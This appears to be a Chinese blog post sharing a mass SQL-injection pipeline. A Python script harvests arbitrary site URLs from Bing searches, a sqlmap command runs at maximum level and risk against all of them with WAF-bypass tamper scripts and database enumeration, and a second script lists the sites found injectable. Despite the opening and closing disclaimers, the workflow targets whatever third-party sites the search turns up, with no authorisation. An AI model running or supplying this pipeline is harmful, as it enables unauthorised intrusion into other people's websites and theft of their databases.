提前声明,仅是技术分享,他人用作危险行为与我无关!!!
sea.py
import time
from urllib.parse import quote_plus

import requests
from lxml import etree
def create_requests(page, data):
    """Fetch one page of Bing search results.

    Args:
        page: zero-based result offset (Bing's ``first`` parameter; multiples of 10).
        data: raw search keyword; URL-encoded here before being placed in
            the query string.

    Returns:
        The response body as text, or None if the request failed.
    """
    # quote_plus() so spaces and special characters (&, #, CJK, ...) in the
    # keyword cannot corrupt the query string. Previously the raw keyword
    # was interpolated directly into the URL.
    url = f"https://www.bing.com/search?q={quote_plus(data)}&first={page}"
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8"
    }
    try:
        response = requests.get(url=url, headers=header, timeout=10)
        # Force UTF-8 decoding; Bing pages are UTF-8 but the header may omit it.
        response.encoding = "utf-8"
        print(f"状态码: {response.status_code}")
        print(f"当前URL: {url}")
        return response.text
    except Exception as e:
        # Best-effort: log and return None so the caller can skip this page.
        print(f"请求出错: {e}")
        return None
# Substrings that disqualify a result URL (search-engine internals, static
# assets, .gov.cn sites, javascript pseudo-links).  Hoisted to module level
# so the sequence is built once instead of once per URL tested.
_SKIP_PATTERNS = (
    "bing.com",
    ".jpg", ".jpeg", ".png", ".pdf",
    ".gov.cn",
    "javascript:",
    "microsoft.com",
    "/search?",
    "go.microsoft.com",
)


def parse_data(context):
    """Extract result links from a Bing results page and append them to urls.txt.

    Args:
        context: HTML text of one results page; None/empty makes this a no-op.

    Side effects:
        Appends accepted URLs to ``urls.txt``.  If no URLs could be
        extracted at all, dumps the raw page to ``debug.html`` so the
        xpath expressions can be fixed offline.
    """
    if not context:
        return
    try:
        parse = etree.HTML(context)
        # Debug aid: report how many anchors the page contains at all.
        print("\n检查页面元素:")
        all_links = parse.xpath('//a/@href')
        print(f"找到的所有链接数量: {len(all_links)}")
        # Primary selector for organic results, followed by two
        # progressively looser fallbacks in case Bing changes its markup.
        urls = parse.xpath('//li[@class="b_algo"]//h2/a/@href')
        if not urls:
            print("尝试备用xpath...")
            urls = parse.xpath('//div[@class="b_title"]//a/@href')
        if not urls:
            print("尝试更多备用xpath...")
            urls = parse.xpath('//h2//a/@href')
        if urls:
            print(f"\n找到 {len(urls)} 个有效URL")
            with open("urls.txt", "a", encoding='utf-8') as f:
                for url in urls:
                    # Skip any URL matching one of the filter substrings.
                    if any(skip in url.lower() for skip in _SKIP_PATTERNS):
                        continue
                    f.write(url + "\n")
                    print(f"已写入: {url}")
        else:
            print("未找到符合条件的URL")
            # Keep the raw page for post-mortem debugging.
            with open("debug.html", "w", encoding='utf-8') as f:
                f.write(context)
            print("已将页面内容保存到debug.html文件中")
    except Exception as e:
        print(f"解析出错: {e}")
def main():
    """Interactive entry point: prompt for a keyword and page count, then scrape."""
    try:
        # Truncate the output file so each run starts fresh.  This must be
        # the same file parse_data() appends to (urls.txt) -- the original
        # cleared bing_urls.txt instead, so urls.txt silently accumulated
        # results across runs.
        with open("urls.txt", "w", encoding='utf-8') as f:
            f.write("")
        data = input("请输入Bing搜索关键词: ")
        # May raise ValueError on non-numeric input; caught by the generic
        # handler below and reported.
        page_multiple = int(input("请输入爬取页数的倍数: "))
        print("----------------------开始抓取----------------------")
        # Bing pages by offset: first=0, 10, 20, ...
        for page in range(0, page_multiple * 10, 10):
            print(f"\n正在抓取第 {(page//10)+1} 页...")
            context = create_requests(page, data)
            if context:
                parse_data(context)
            time.sleep(1)  # throttle between requests
        print("\n----------------------抓取完毕----------------------")
    except KeyboardInterrupt:
        print("\n程序被用户中断")
    except Exception as e:
        print(f"程序执行出错: {e}")
ex.py
import os
import shutil
from datetime import datetime
def get_exists(path):
    """Scan sqlmap per-target output directories under *path*.

    A directory whose ``log`` file is non-empty is treated as a hit and
    reported; a directory whose ``log`` file is empty is deleted.

    Args:
        path: root directory to scan (sqlmap's --output-dir).

    Returns:
        List of directory paths whose log file is non-empty.
    """
    successful_injections = []
    empty_dirs = []
    print(f"开始分析目录: {path}")
    print("=" * 50)
    for root, dirs, files in os.walk(path):
        log_path = os.path.join(root, "log")
        if not os.path.isfile(log_path):
            continue
        if os.path.getsize(log_path) == 0:
            print(f"删除空结果: {root}")
            # Defer deletion until the walk is finished: removing
            # directories while os.walk() is still iterating the same tree
            # can make it attempt to descend into paths that no longer
            # exist (the original called shutil.rmtree mid-walk).
            empty_dirs.append(root)
        else:
            successful_injections.append(root)
            print(f"发现注入点: {root}")
            # Best-effort peek at the first log line for context.
            try:
                with open(log_path, 'r', encoding='utf-8') as f:
                    first_line = f.readline().strip()
                print(f"详细信息: {first_line}")
            except Exception as e:
                print(f"无法读取详细信息: {e}")
            print("-" * 30)
    for d in empty_dirs:
        shutil.rmtree(d)
    return successful_injections
if __name__ == '__main__':
    # Directory containing this script; results/ is expected next to it.
    current_dir = os.path.dirname(os.path.abspath(__file__))
    results_dir = os.path.join(current_dir, "results")
    print(f"开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    print("=" * 50)
    if not os.path.exists(results_dir):
        # Plain string literal: the original used an f-string with no
        # placeholders (lint F541); the printed text is unchanged.
        print("Error: 当前目录下未找到results文件夹")
        exit()
    try:
        successful_points = get_exists(results_dir)
        print("\n扫描统计:")
        print(f"总共发现: {len(successful_points)} 个注入点")
        # Persist the findings next to the script.
        output_file = os.path.join(current_dir, 'injection_results.txt')
        with open(output_file, 'w', encoding='utf-8') as f:
            f.write(f"扫描时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
            f.write(f"发现注入点数量: {len(successful_points)}\n\n")
            for point in successful_points:
                f.write(f"{point}\n")
        print(f"\n结果已保存到: {output_file}")
    except Exception as e:
        print(f"执行出错: {e}")
    print("\n完成时间:", datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
顺序就是
1、启动sea脚本,按照提示输入相关信息,将输出一个urls.txt文件
2、使用sqlmap
sqlmap -m urls.txt --batch --random-agent --level 5 --risk 3 --threads 10 --dbs --output-dir=./results --tamper="space2comment,between"
参数说明:
- `-m urls.txt`: 从urls.txt文件中读取多个目标URL
- `--batch`: 自动选择默认选项,不需要用户手动输入
- `--random-agent`: 使用随机User-Agent,避免被封锁
- `--level 5`: 设置测试等级为最高级别5(范围1-5)
- `--risk 3`: 设置风险等级为最高级别3(范围1-3)
- `--threads 10`: 使用10个线程进行扫描
- `--dbs`: 枚举所有数据库名
- `--tables`: 枚举所有表名
- `--columns`: 枚举所有列名
- `--output-dir=./results`: 输出结果在当前文件夹
- `--delay=1`: 请求延时
- `--tamper="space2comment,between"`: 使用两个tamper脚本来绕过WAF
3、启动ex脚本,将得到sql可注入的点。
再次声明,技术虽好,但合理用之!!!